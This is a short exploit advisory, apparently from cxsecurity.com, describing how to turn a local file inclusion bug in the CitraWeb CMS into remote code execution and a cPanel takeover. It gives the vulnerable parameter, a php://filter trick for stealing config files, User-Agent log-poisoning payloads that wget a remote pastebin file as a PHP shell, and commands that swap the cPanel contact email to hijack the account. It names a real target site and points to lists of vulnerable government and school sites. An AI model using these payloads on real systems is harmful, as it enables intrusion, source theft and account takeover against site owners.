CitraWeb Local File Inclusion to Remote Code Execution and get Cpanel

2019.06.03
id 4nzeL4 (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Hi all! in this video I will share about LFI to RCE on WEB Image CMS where this CMS has been used enough on websites in Indonesia such as government, E-commerce, school and others. You can see a list of websites that use this CMS at once to become vuln website for LFI to RCE link: https://citra.web.id/en/project.html okay I already have one of the targets Target: https://www.eureka.co.id/ here I will practice some techniques for utilizing LFI bugs besides for RCE, that is, we can steal Source Code like Config and others so please don't skipp this video unless you are a master wkwk [+] LFI exploits: / system / ajax /? file [+] Get file config with LFI php: //filter/convert.base64-encode/resource=file [+] Exploit RCE: Step 1. Mozilla / 5.0 (Windows NT 6.1; rv: 27.0) Gecko / 20100101 Firefox / 27.0 <? = System ('wget https://pastebin.com/raw/yYJVNJqp -O x.php; ls -la')?> // make sure the x.php file already exists step 2. Mozilla / 5.0 (Windows NT 6.1; rv: 27.0) Gecko / 20100101 Firefox / 27.0 <? = System ('mv .htaccess .htacces')?> // now we access the file x.php // yups succeeded // I will try to enter the code // next we will get Get cpanel access [+] Get Cpanel with RCE: enter command # wget https://pastebin.com/raw/HcwPV8hd -O.contactemail # mv. contactemail ../ # mv ../.cpanel/contactinfo ../.cpanel/contactinfo2 // admeur07 this is the username for cpanel // https://pastebin.com/raw/HcwPV8hd > the contents are e-mail to receive the code

References:

https://google.com
https://facebook.com/akazh.gov


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top